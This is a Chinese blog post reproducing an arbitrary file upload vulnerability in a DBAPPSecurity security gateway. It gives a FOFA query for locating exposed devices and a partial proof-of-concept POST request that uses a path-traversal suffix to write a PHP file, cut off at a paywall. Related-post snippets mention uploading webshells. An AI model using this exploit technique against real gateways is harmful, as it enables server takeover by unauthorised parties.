安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量588 收藏 6
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/135061886
版权
漏洞复现 专栏收录该内容
36 篇文章 9 订阅 ¥9.90 ¥99.00
订阅专栏

简介

安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。

该产品aaa_local_web_preview端点存在文件上传漏洞。

漏洞复现

FOFA语法:

title=="明御安全网关"

界面访问如下所示:

POC:

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../test.php HTTP/1.1Host: ipUser-Agent: Mozilla/5.0Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1aAccept-Encoding: gzipContent-Length: 200
--849978f98abe41119122148e4aa65b1a
了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞
晚风不及你
03-02 1041
明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防的下一代安全防护体系。
安恒明安全网关 aaa_local_web_preview文件上传漏洞复现
holyxp的博客
12-18 645
明御安全网关秉持安全可视、简单 有效的只理念,以资产为视角,构建全流程防的下一代安全防护体系,并融合传统防火墙、入侵检测、入侵防系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关明御安全网关aaa local web preview文件处存在文件上传漏洞,攻击者可以利用该漏洞上传恶意文件进而进行敏感操作获取服务器权。
漏洞复现--安恒明安全网关 aaa_local_web_preview 任意文件上传
qq_53003652的博客
11-29 1119
安恒明安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品aaa_local_web_preview端点存在文件上传漏洞。限制aaa_local_web_preview的访问权限,联系商家获取修复补丁。success即代表上传成功,访问/test.php。成功解析,可上传免杀木马获取服务器权限。
安恒信息-明御安全网关 命令执行漏洞分析
星落的博客
12-13 4506
安恒信息-明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。漏洞位置:/usr/local/webui/webui/modules/aaa/portal_auth.mds
漏洞复现--安恒明安全网关文件上传
qq_53003652的博客
10-17 462
安恒明安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。该产品存在文件上传漏洞。如此页面便存在漏洞。该POC已将一句话木马写入,名称为.xxx.php,路径在/webui/.xxx.php。脚本来自揽月安全团队。
安恒信息明御APT攻击预警平台配置手册产品白皮书
05-13
安恒信息明御APT攻击预警平台配置手册产品白皮书
明御®APT攻击(网络战)预警平台V2.0.63 产品白皮书_20200508.pdf
05-13
安恒信息明御APT预警平台配置手册
安恒明网关注入.md
07-09
安恒明网关注入
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
Apache Shiro 是一个强大且易用的 Java 安全框架,提供身份认证、授权、加密以及会话管理功能,简化了应用安全的实现。在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:...
安恒_务实的网络安全.pdf
08-15
"安恒_务实的网络安全"这份文档关注的是如何将网络安全策略与业务目标紧密结合,以确保公司的核心利益不受侵犯。以下是其中涉及的关键知识点: 1. **业务安全**:业务安全的核心是保护企业的关键业务流程不受威胁,...
安恒明安全网关文件上传
m0_46317063的博客
08-18 503
title=“明御安全网关
漏洞复现安恒明安全网关远程命令执行漏洞
m0_71285176的博客
01-10 1021
明御安全网关秉持安全可视、简单 有效的只理念,以资产为视角,构建全流程防的下一代安全防护体系,并融合传统防火墙、入侵检测、入侵防系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关明御安全网关aaa_portal_auth_config_reset接口处存在RCE漏洞,攻击者通过漏洞可以获取服务器权限。地址:http://xxx.xxxx.xxx/xxx.php
安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞
holyxp的博客
07-13 1495
安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
网络安全学习(二十三)防火墙
m0_56413004的博客
06-06 1962
是一款具备安全防护功能的网络设备隔离网络:将需要保护的网络与不可信任网络进行隔离,隐藏信息并进行安全防护访问控制(ACL)攻击防护冗余设计(HSRP)路由、交换日志记录虚拟专用网络NAT防火墙区域概念内部区域(员工,核心数据)DMZ区域称为“隔离区”,也称“非军事化区/停火区”(对外服务:网页,邮件服务器)外部区域一般来说: 内部区域 内部区域能访问外部区域(互联网) 内部区域能访问DMZ区域。 DMZ区域
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 169
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 148
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 694
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
“微软蓝屏”事件暴露了网络安全哪些问题?
嫦娥妹妹等等我的博客
07-24 95
微软蓝屏”事件暴露了操作系统和软件在更新、驱动管理、恶意软件防护、配置管理及用户教育方面的网络安全问题。为防止此类问题,应重视系统维护和网络安全,定期更新、应用补丁、使用最新的安全软件,并保持良好的安全习惯。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值